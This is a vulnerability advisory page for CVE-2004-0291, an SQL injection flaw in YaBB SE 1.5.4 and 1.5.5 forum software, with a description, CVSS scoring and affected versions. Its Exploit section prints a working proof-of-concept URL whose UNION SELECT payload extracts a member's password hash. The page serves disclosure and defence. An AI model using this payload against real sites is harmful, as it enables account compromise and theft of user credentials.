CVE-2004-0291 - YABB SE Quote Parameter SQL Injection Vulnerability

Publication

2004-11-23

Last modification

2017-07-11

Summary

SQL injection vulnerability in post.php for YaBB SE 1.5.4 and 1.5.5 allows remote attackers to obtain hashed passwords via the quote parameter.

Description

It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software. YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue, however, other versions could be affected as well.

Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: info@vumetric.com <mailto:info@vumetric.com>.

Exploit

No exploit is required.The following proof of concept has been supplied:http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

Risk level (CVSS AV:N/AC:L/Au:N/C:P/I:N/A:N)

Medium

5.0

Access Vector

  • Network
  • Adjacent Network
  • Local

Access Complexity

  • Low
  • Medium
  • High

Authentication

  • None
  • Single
  • Multiple

Confident. Impact

  • Complete
  • Partial
  • None

Integrity Impact

  • Complete
  • Partial
  • None

Affected Products

Vendor Product Versions
Yabb Yabb  1.5.4 , 1.5.5